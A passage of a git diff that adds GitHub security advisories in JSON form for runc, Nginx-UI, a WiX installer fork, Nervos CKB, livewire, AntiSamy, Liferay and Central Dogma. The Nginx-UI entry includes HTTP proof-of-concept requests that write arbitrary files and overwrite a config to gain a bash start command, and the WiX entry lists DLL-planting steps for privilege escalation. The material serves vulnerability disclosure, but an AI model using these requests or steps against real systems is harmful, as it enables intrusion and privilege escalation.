require a user to run a malicious image.\n\n### Patches\nrunc 1.1.12 has been released, and includes patches for this issue. Note that there are four separate fixes applied:\n\n* Checking that the working directory is actually inside the container by checking whether `os.Getwd` returns `ENOENT` (Linux provides a way of detecting if cwd is outside the current namespace root). This explicitly blocks runc from executing a container process when inside a non-container path and thus eliminates attacks 1 and 2 even in the case of fd leaks.\n* Close all internal runc file descriptors in the final stage of `runc init`, right before `execve`. This ensures that internal file descriptors cannot be used as an argument to `execve` and thus eliminates attacks 3a and 3b, even in the case of fd leaks. This requires hooking into some Go runtime internals to make sure we don't close critical Go internal file descriptors.\n* Fixing the specific fd leaks that made these bug exploitable (mark `/sys/fs/cgroup` as `O_CLOEXEC` and backport a fix for some `*os.File` leaks).\n* In order to protect against future `runc init` file descriptor leaks, mark all non-stdio files as `O_CLOEXEC` before executing `runc init`.\n\n### Other Runtimes\n\nWe have discovered that several other container runtimes are either potentially vulnerable to similar attacks, or do not have sufficient protection against attacks of this nature. We recommend other container runtime authors look at [our patches](#Patches) and make sure they at least add a `getcwd() != ENOENT` check as well as consider whether `close_range(3, UINT_MAX, CLOSE_RANGE_CLOEXEC)` before executing their equivalent of `runc init` is appropriate.\n\n * crun 1.12 does not leak any useful file descriptors into the `runc init`-equivalent process (so this attack is _not exploitable_ as far as we can tell), but no care is taken to make sure all non-stdio files are `O_CLOEXEC` and there is no check after `chdir(2)` to ensure the working directory is inside the container. If a file descriptor happened to be leaked in the future, this could be exploitable. In addition, any file descriptors passed to `crun` are not closed until the container process is executed, meaning that easily-overlooked programming errors by users of `crun` can lead to these attacks becoming exploitable.\n * youki 0.3.1 does not leak any useful file descriptors into the `runc init`-equivalent process (so this attack is _not exploitable_ as far as we can tell) however this appears to be pure luck. `youki` does leak a directory file descriptor from the host mount namespace, but it just so happens that the directory is the rootfs of the container (which then gets `pivot_root`'d into and so ends up as a in-root path thanks to `chroot_fs_refs`). In addition, no care is taken to make sure all non-stdio files are `O_CLOEXEC` and there is no check after `chdir(2)` to ensure the working directory is inside the container. If a file descriptor happened to be leaked in the future, this could be exploitable. In addition, any file descriptors passed to `youki` are not closed until the container process is executed, meaning that easily-overlooked programming errors by users of `youki` can lead to these attacks becoming exploitable.\n * LXC 5.0.3 does not appear to leak any useful file descriptors, and they have comments noting the importance of not leaking file descriptors in `lxc-attach`. However, they don't seem to have any proactive protection against file descriptor leaks at the point of `chdir` such as using `close_range(...)` (they do have RAII-like `__do_fclose` closers but those don't necessarily stop all leaks in this context) nor do they have any check after `chdir(2)` to ensure the working directory is inside the container. Unfortunately it seems they cannot use `CLOSE_RANGE_CLOEXEC` because they don't need to re-exec themselves.\n\n### Workarounds\nFor attacks 1 and 2, only permit containers (and `runc exec`) to use a `process.cwd` of `/`. It is not possible for `/` to be replaced with a symlink (the path is resolved from within the container's mount namespace, and you cannot change the root of a mount namespace or an fs root to a symlink).\n\nFor attacks 1 and 3a, only permit users to run trusted images.\n\nFor attack 3b, there is no practical workaround other than never using `runc exec` because any binary you try to execute with `runc exec` could end up being a malicious binary target.\n\n### See Also\n* https://www.cve.org/CVERecord?id=CVE-2024-21626\n* https://github.com/opencontainers/runc/releases/tag/v1.1.12\n* The runc 1.1.12 merge commit https://github.com/opencontainers/runc/commit/a9833ff391a71b30069a6c3f816db113379a4346, which contains the following security patches:\n * https://github.com/opencontainers/runc/commit/506552a88bd3455e80a9b3829568e94ec0160309\n * https://github.com/opencontainers/runc/commit/0994249a5ec4e363bfcf9af58a87a722e9a3a31b\n * https://github.com/opencontainers/runc/commit/fbe3eed1e568a376f371d2ced1b4ac16b7d7adde\n * https://github.com/opencontainers/runc/commit/284ba3057e428f8d6c7afcc3b0ac752e525957df\n * https://github.com/opencontainers/runc/commit/b6633f48a8c970433737b9be5bfe4f25d58a5aa7\n * https://github.com/opencontainers/runc/commit/683ad2ff3b01fb142ece7a8b3829de17150cf688\n * https://github.com/opencontainers/runc/commit/e9665f4d606b64bf9c4652ab2510da368bfbd951\n\n### Credits\n\nThanks to Rory McNamara from Snyk for discovering and disclosing the original vulnerability (attack 1) to Docker, @lifubang from acmcoder for discovering how to adapt the attack to overwrite host binaries (attack 3a), and Aleksa Sarai from SUSE for discovering how to adapt the attacks to work as container breakouts using `runc exec` (attacks 2 and 3b).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/opencontainers/runc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0-rc93" + }, + { + "fixed": "1.1.12" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.11" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21626" + }, + { + "type": "WEB", + "url": "https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/opencontainers/runc" + }, + { + "type": "WEB", + "url": "https://github.com/opencontainers/runc/releases/tag/v1.1.12" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYMO3BANINS6RGFQFKPRG4FIOJ7GWYTL/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176993/runc-1.1.11-File-Descriptor-Leak-Privilege-Escalation.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/01/1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-403" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:44:08Z", + "nvd_published_at": "2024-01-31T22:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-xvq9-4vpv-227m/GHSA-xvq9-4vpv-227m.json b/advisories/github-reviewed/2024/01/GHSA-xvq9-4vpv-227m/GHSA-xvq9-4vpv-227m.json new file mode 100644 index 0000000000000..7122863f26765 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-xvq9-4vpv-227m/GHSA-xvq9-4vpv-227m.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xvq9-4vpv-227m", + "modified": "2024-01-29T22:30:18Z", + "published": "2024-01-29T22:30:18Z", + "aliases": [ + "CVE-2024-23827" + ], + "summary": "Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature", + "details": "### Summary\n\nThe Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.\n\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72\n\n```\nfunc AddCert(c *gin.Context) {\n\tvar json struct {\n\t\tName string `json:\"name\"`\n\t\tSSLCertificatePath string `json:\"ssl_certificate_path\" binding:\"required\"`\n\t\tSSLCertificateKeyPath string `json:\"ssl_certificate_key_path\" binding:\"required\"`\n\t\tSSLCertificate string `json:\"ssl_certificate\"`\n\t\tSSLCertificateKey string `json:\"ssl_certificate_key\"`\n\t\tChallengeMethod string `json:\"challenge_method\"`\n\t\tDnsCredentialID int `json:\"dns_credential_id\"`\n\t}\n\tif !api.BindAndValid(c, &json) {\n\t\treturn\n\t}\n\tcertModel := &model.Cert{\n\t\tName: json.Name,\n\t\tSSLCertificatePath: json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tChallengeMethod: json.ChallengeMethod,\n\t\tDnsCredentialID: json.DnsCredentialID,\n\t}\n\n\terr := certModel.Insert()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tcontent := &cert.Content{\n\t\tSSLCertificatePath: json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tSSLCertificate: json.SSLCertificate,\n\t\tSSLCertificateKey: json.SSLCertificateKey,\n\t}\n\n\terr = content.WriteFile()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tc.JSON(http.StatusOK, Transformer(certModel))\n}\n\n```\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15\n\n```\nfunc (c *Content) WriteFile() (err error) {\n\t// MkdirAll creates a directory named path, along with any necessary parents,\n\t// and returns nil, or else returns an error.\n\t// The permission bits perm (before umask) are used for all directories that MkdirAll creates.\n\t// If path is already a directory, MkdirAll does nothing and returns nil.\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif c.SSLCertificate != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\tif c.SSLCertificateKey != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\treturn\n}\n```\n\n\n### PoC\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 144\nAccept: application/json, text/plain, */*\nAuthorization: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/tmp/test\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"test\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```\nroot@aze:~/nginx# ls -la /tmp/test*\n-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test\n-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2\n```\n\nIt's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.\n\n```\nroot@aze:~/nginx# cat app.ini | grep \"StartCmd\"\nStartCmd = login\n```\nThen we overwrite the `StartCmd` with `bash`\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 980\nAccept: application/json, text/plain, */*\nAuthorization: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/root/nginx/app.ini\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"[server]\\r\\nHttpHost = 0.0.0.0\\r\\nHttpPort = 9000\\r\\nRunMode = debug\\r\\nJwtSecret = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\\r\\nNodeSecret = 139ab224-9e9e-444f-987e-b3a651175ad5\\r\\nHTTPChallengePort = 9180\\r\\nEmail = props@pros.com\\r\\nDatabase = database\\r\\nStartCmd = bash\\r\\nCADir = dqsdqsd\\r\\nDemo = false\\r\\nPageSize = 10\\r\\nGithubProxy = dqsdqfsdfsdfsdfsd\\r\\n\\r\\n[nginx]\\r\\nAccessLogPath =\\r\\nErrorLogPath =\\r\\nConfigDir =\\r\\nPIDPath =\\r\\nTestConfigCmd =\\r\\nReloadCmd =\\r\\nRestartCmd =\\r\\n\\r\\n[openai]\\r\\nBaseUrl = \\r\\nToken =\\r\\nProxy =\\r\\nModel = \\r\\n\\r\\n[casdoor]\\r\\nEndpoint =\\r\\nClientId =\\r\\nClientSecret =\\r\\nCertificate =\\r\\nOrganization =\\r\\nApplication =\\r\\nRedirectUri =\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```\nroot@aze:~/nginx# cat app.ini | grep \"StartCmd\"\nStartCmd = bash\n```\n\nFor the new config to be applied the app needs to be restarted\n\n![image](https://user-images.githubusercontent.com/26652608/299331664-6415a8c1-6611-4e53-8137-3e574c58da28.png)\n\n\n\n### Impact\n\nArbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/0xJacky/Nginx-UI" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0.0-beta.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-xvq9-4vpv-227m" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23827" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/commit/8581bdd3c6f49ab345b773517ba9173fa7fc6199" + }, + { + "type": "PACKAGE", + "url": "https://github.com/0xJacky/nginx-ui" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72" + }, + { + "type": "WEB", + "url": "https://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:18Z", + "nvd_published_at": "2024-01-29T16:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-259p-rvjx-ffwg/GHSA-259p-rvjx-ffwg.json b/advisories/github-reviewed/2024/02/GHSA-259p-rvjx-ffwg/GHSA-259p-rvjx-ffwg.json new file mode 100644 index 0000000000000..54a32cbcb98e6 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-259p-rvjx-ffwg/GHSA-259p-rvjx-ffwg.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-259p-rvjx-ffwg", + "modified": "2024-02-08T18:24:21Z", + "published": "2024-02-08T18:24:21Z", + "aliases": [ + + ], + "summary": "Panel::Software Customized WiX .be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges", + "details": "# Summary\n\n.be TEMP folder is vulnerable to DLL redirection attacks that allow the attacker to escalate privileges.\n\n# Details\n\nIf the bundle is not run as admin, the user's TEMP folder is used and not the system TEMP folder. A utility is able to monitor the user's TEMP folder for changes and drop its own DLL into the .be/.Local folder immediately when the .be folder is created. When the burn engine elevates, the malicious DLL receives elevated privileges.\n\n# PoC\n\nAs a standard, non-admin user:\n\n1. Monitor the user's TEMP folder for changes using ReadDirectoryChangesW\n1. On FILE_ACTION_ADDED, check if the folder name is .be\n1. Create a folder in .be named after the bundle + .Local (e.g. MyInstaller.exe.Local)\n1. Put the malicious COMCTL32.DLL in the .Local folder following the naming used for the real DLL (e.g. MyInstaller.exe.Local/x86_microsoft.windows.common-controls_.../COMCTL32.dll)\n1. Do hacker things when the engine escalates and the malicious DLL is loaded\n\nProper naming for the path can be obtained by using GetModuleHandle(\"comctl32.dll\") and GetModuleFileName.\n\n# Impact\n\nDLL redirection utilizing .exe.Local Windows capability. This impacts any installer built with the WiX installer framework.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "PanelSW.Custom.WiX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.15.0-a44" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nirbar/wix3/security/advisories/GHSA-259p-rvjx-ffwg" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nirbar/wix3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:24:21Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-29c2-65rj-h343/GHSA-29c2-65rj-h343.json b/advisories/github-reviewed/2024/02/GHSA-29c2-65rj-h343/GHSA-29c2-65rj-h343.json new file mode 100644 index 0000000000000..6cf470c3d406b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-29c2-65rj-h343/GHSA-29c2-65rj-h343.json @@ -0,0 +1,146 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29c2-65rj-h343", + "modified": "2024-02-03T00:29:06Z", + "published": "2024-02-03T00:29:06Z", + "aliases": [ + + ], + "summary": "Nervos CKB Permit load cell data from memory", + "details": "### Impact\n\nThe faulty nodes will reject transactions which calls `load_cell_data` syscall but the input cell is still in the mempool. They also ban other nodes and cause the network separation.\n\n### Patches\n\n0.35.2, 0.36.1, 0.37.1, 0.38.2", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.39.0-rc1" + }, + { + "fixed": "0.39.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.35.0-rc1" + }, + { + "fixed": "0.35.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.36.0-rc1" + }, + { + "fixed": "0.36.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.37.0-rc1" + }, + { + "fixed": "0.37.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.38.0-rc1" + }, + { + "fixed": "0.38.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-29c2-65rj-h343" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/277061867eb7d2766fa6737c8bf00684fc2462a6" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/37d60d581c6713d3aca1a57018eaea45447ae0b2" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/8f115b387f8f60f938bce4591f26cd78430b8771" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/91efb7b6b4329d70d60eee91d5239a2de9b0d99f" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/97647408ee9dbf525f6c678796e770887c9f8738" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:29:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-2cjh-75gp-34gc/GHSA-2cjh-75gp-34gc.json b/advisories/github-reviewed/2024/02/GHSA-2cjh-75gp-34gc/GHSA-2cjh-75gp-34gc.json new file mode 100644 index 0000000000000..451e2b2385cf6 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-2cjh-75gp-34gc/GHSA-2cjh-75gp-34gc.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cjh-75gp-34gc", + "modified": "2024-02-06T20:00:20Z", + "published": "2024-02-01T09:30:18Z", + "aliases": [ + "CVE-2024-22859" + ], + "summary": "livewire Cross-Site Request Forgery vulnerability", + "details": "Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "livewire/livewire" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.0.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22859" + }, + { + "type": "WEB", + "url": "https://github.com/livewire/livewire/commit/5d887316f2aaf83c0e380ac5e72766f19700fa3b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/livewire/livewire" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T19:21:55Z", + "nvd_published_at": "2024-02-01T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-2mrq-w8pv-5pvq/GHSA-2mrq-w8pv-5pvq.json b/advisories/github-reviewed/2024/02/GHSA-2mrq-w8pv-5pvq/GHSA-2mrq-w8pv-5pvq.json new file mode 100644 index 0000000000000..64bd80f789533 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-2mrq-w8pv-5pvq/GHSA-2mrq-w8pv-5pvq.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mrq-w8pv-5pvq", + "modified": "2024-02-02T18:44:45Z", + "published": "2024-02-02T18:10:04Z", + "aliases": [ + "CVE-2024-23635" + ], + "summary": "Malicious input can provoke XSS when preserving comments", + "details": "# Impact\n\nThere is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output.\n\n# Patches\n\nPatched in AntiSamy 1.7.5 and later. This is due to parsing behavior in the [neko-htmlunit](https://github.com/HtmlUnit/htmlunit-neko) dependency, just by updating to a newer version the issue was solved. See important remediation details in the reference given below.\n\n# Workarounds\n\nIf you cannot upgrade to a fixed version of the library, the following mitigation can be applied until you can upgrade: Manually edit your AntiSamy policy file (e.g., antisamy.xml) by deleting the `preserveComments` directive or setting its value to `false`, if present.\n\nAs the previously mentioned policy settings are preconditions for the mXSS attack to work, changing them as recommended should be sufficient to protect you against this vulnerability when using a vulnerable version of this library. However, the existing bug would still be present in the parser dependency (neko-htmlunit) and therefore in AntiSamy. The safety of this workaround relies on configurations that may change in the future and don't address the root cause of the vulnerability. As such, it is strongly recommended to upgrade to a fixed version of AntiSamy.\n\n# For more information\n\nIf you have any questions or comments about this advisory:\n\nEmail one of the project co-leaders, listed on the [OWASP AntiSamy project](https://owasp.org/www-project-antisamy/) page, under \"Leaders\".\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.owasp.antisamy:antisamy" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.7.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.7.4" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nahsra/antisamy/security/advisories/GHSA-2mrq-w8pv-5pvq" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23635" + }, + { + "type": "WEB", + "url": "https://github.com/nahsra/antisamy/commit/12a2e31d3855430c119480655c2bbbbb79a66ecd" + }, + { + "type": "WEB", + "url": "https://github.com/nahsra/antisamy/commit/3e84410ed06ab67f0a4cc3183c67528210f4847d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nahsra/antisamy" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:04Z", + "nvd_published_at": "2024-02-02T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-2mx7-xvfg-fg53/GHSA-2mx7-xvfg-fg53.json b/advisories/github-reviewed/2024/02/GHSA-2mx7-xvfg-fg53/GHSA-2mx7-xvfg-fg53.json new file mode 100644 index 0000000000000..abdc9267ebb7a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-2mx7-xvfg-fg53/GHSA-2mx7-xvfg-fg53.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mx7-xvfg-fg53", + "modified": "2024-02-08T18:25:35Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2023-47798" + ], + "summary": "Liferay Portal's account lockout does not invalidate existing user sessions", + "details": "Account lockout in Liferay Portal 7.2.0 through 7.3.0, and older unsupported versions, and Liferay DXP 7.2 before fix pack 5, and older unsupported versions does not invalidate existing user sessions, which allows remote authenticated users to remain authenticated after an account has been locked.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47798" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-47798" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:25:35Z", + "nvd_published_at": "2024-02-08T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-34q3-p352-c7q8/GHSA-34q3-p352-c7q8.json b/advisories/github-reviewed/2024/02/GHSA-34q3-p352-c7q8/GHSA-34q3-p352-c7q8.json new file mode 100644 index 0000000000000..bd54881e80a7f --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-34q3-p352-c7q8/GHSA-34q3-p352-c7q8.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34q3-p352-c7q8", + "modified": "2024-02-06T22:18:58Z", + "published": "2024-02-02T16:55:25Z", + "aliases": [ + "CVE-2024-1143" + ], + "summary": "Central Dogma Authentication Bypass Vulnerability via Session Leakage", + "details": "### Vulnerability Overview\nA vulnerability has been identified in Central Dogma versions prior to 0.64.0, allowing for the leakage of user sessions and subsequent authentication bypass. The issue stems from a Cross-Site Scripting (XSS) attack vector that targets the RelayState of Security Assertion Markup Language (SAML).\n\n### Impact\nSuccessful exploitation of this vulnerability enables malicious actors to leak user sessions, leading to the compromise of authentication mechanisms. This, in turn, can facilitate unauthorized access to sensitive resources.\n\n### Patches\nThis vulnerability is addressed and resolved in Central Dogma version 0.64.0. Users are strongly encouraged to upgrade to this version or later to mitigate the risk associated with the authentication bypass.\n\n### Workarounds\nNo viable workarounds are currently available for this vulnerability. It is recommended to apply the provided patch promptly.\n\n### References\n- [OASIS SAML v2.0 Errata 05](https://docs.oasis-open.org/security/saml/v2.0/errata05/os/saml-v2.0-errata05-os.html#__RefHeading__8196_1983180497)\n- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.linecorp.centraldogma:centraldogma-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.64.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/line/centraldogma/security/advisories/GHSA-34q3-p352-c7q8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1143" + }, + { + "type": "WEB", + "url": "https://github.com/line/centraldogma/commit/8edcf913b88101aff70008156b0881850e005783" + }, + { + "type": "PACKAGE", + "url": "https://github.com/line/centraldogma" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T16:55:25Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git 